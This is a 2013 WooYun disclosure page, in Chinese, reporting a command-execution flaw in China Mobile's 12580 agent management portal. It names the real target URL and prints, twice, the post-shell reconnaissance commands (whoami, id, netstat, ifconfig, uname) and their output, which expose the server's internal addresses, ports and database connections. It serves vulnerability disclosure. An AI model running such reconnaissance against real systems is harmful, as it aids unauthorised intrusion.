当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034029

漏洞标题:中国移动12580代理商管理系统命令执行漏洞以拿shell

相关厂商:12580.com

漏洞作者: Restriedarea

提交时间:2013-08-12 14:33

修复时间:2013-09-26 14:34

公开时间:2013-09-26 14:34

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-12: 细节已通知厂商并且等待厂商处理中
2013-08-16: 厂商已经确认,细节仅向厂商公开
2013-08-26: 细节向核心白帽子及相关领域专家公开
2013-09-05: 细节向普通白帽子公开
2013-09-15: 细节向实习白帽子公开
2013-09-26: 细节向公众公开

简要描述:

中国移动12580代理商管理系统命令执行漏洞以拿shell

详细说明:

Target: http://etagent.12580.com/NewPortal/loginAction.do
Whoami: tomcat
WebPath: /opt/newportal/webapps/NewPortal/
whoami
tomcat
id
uid=500(tomcat) gid=500(tomcat) groups=500(tomcat)context=user_u:system_r:unconfined_t
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8005 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 10.1.5.186:8009 10.1.5.111:44165 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:60683 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:46731 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:47849 ESTABLISHED
tcp 0 0 10.1.5.186:46089 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46092 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:54384 ESTABLISHED
tcp 0 0 10.1.5.186:46078 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:55991 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:33219 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:50267 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:58035 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:54611 TIME_WAIT
tcp 0 0 10.1.5.186:46091 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46087 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46074 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:54897 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54403 ESTABLISHED
tcp 0 0 10.1.5.186:46077 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46086 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:45924 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:47899 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:59002 ESTABLISHED
tcp 0 0 10.1.5.186:46070 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:55281 TIME_WAIT
tcp 0 0 10.1.5.186:10050 10.1.254.40:46070 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:53054 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:45269 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:56379 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:46873 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54289 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:51584 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:47983 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54126 ESTABLISHED
tcp 0 0 10.1.5.186:46076 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:52496 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:47761 TIME_WAIT
tcp 0 0 10.1.5.186:10050 10.1.254.40:50412 TIME_WAIT
tcp 0 0 10.1.5.186:46073
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:22:2D:A1
inet addr:10.1.5.185 Bcast:10.1.5.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1585869 errors:0 dropped:0 overruns:0 frame:0
TX packets:377451 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:151693004 (144.6 MiB) TX bytes:47244385 (45.0 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16782 errors:0 dropped:0 overruns:0 frame:0
TX packets:16782 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2237726 (2.1 MiB) TX bytes:2237726 (2.1 MiB)
uname -a
Linux 5_68 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

[WLYPRB$RVMFGRT({5]9}6H.jpg

QQ截图20130810133623.png

漏洞证明:

Target: http://etagent.12580.com/NewPortal/loginAction.do
Whoami: tomcat
WebPath: /opt/newportal/webapps/NewPortal/
whoami
tomcat
id
uid=500(tomcat) gid=500(tomcat) groups=500(tomcat)context=user_u:system_r:unconfined_t
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8005 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 10.1.5.186:8009 10.1.5.111:44165 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:60683 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:46731 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:47849 ESTABLISHED
tcp 0 0 10.1.5.186:46089 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46092 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:54384 ESTABLISHED
tcp 0 0 10.1.5.186:46078 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:55991 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:33219 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:50267 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:58035 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:54611 TIME_WAIT
tcp 0 0 10.1.5.186:46091 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46087 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46074 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:54897 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54403 ESTABLISHED
tcp 0 0 10.1.5.186:46077 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:46086 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:45924 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:47899 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:59002 ESTABLISHED
tcp 0 0 10.1.5.186:46070 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:55281 TIME_WAIT
tcp 0 0 10.1.5.186:10050 10.1.254.40:46070 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:53054 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:45269 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:56379 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:46873 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54289 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:51584 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:47983 TIME_WAIT
tcp 0 0 10.1.5.186:8009 10.1.5.111:54126 ESTABLISHED
tcp 0 0 10.1.5.186:46076 10.1.5.242:1521 ESTABLISHED
tcp 0 0 10.1.5.186:8009 10.1.5.111:52496 ESTABLISHED
tcp 0 0 10.1.5.186:10050 10.1.254.40:47761 TIME_WAIT
tcp 0 0 10.1.5.186:10050 10.1.254.40:50412 TIME_WAIT
tcp 0 0 10.1.5.186:46073
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:22:2D:A1
inet addr:10.1.5.185 Bcast:10.1.5.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1585869 errors:0 dropped:0 overruns:0 frame:0
TX packets:377451 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:151693004 (144.6 MiB) TX bytes:47244385 (45.0 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:16782 errors:0 dropped:0 overruns:0 frame:0
TX packets:16782 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2237726 (2.1 MiB) TX bytes:2237726 (2.1 MiB)
uname -a
Linux 5_68 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

[WLYPRB$RVMFGRT({5]9}6H.jpg

QQ截图20130810133623.png

修复方案:

你懂得 升级吧

版权声明:转载请注明来源 Restriedarea@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-08-16 23:22

厂商回复:

最新状态:

暂无


漏洞评价:

评论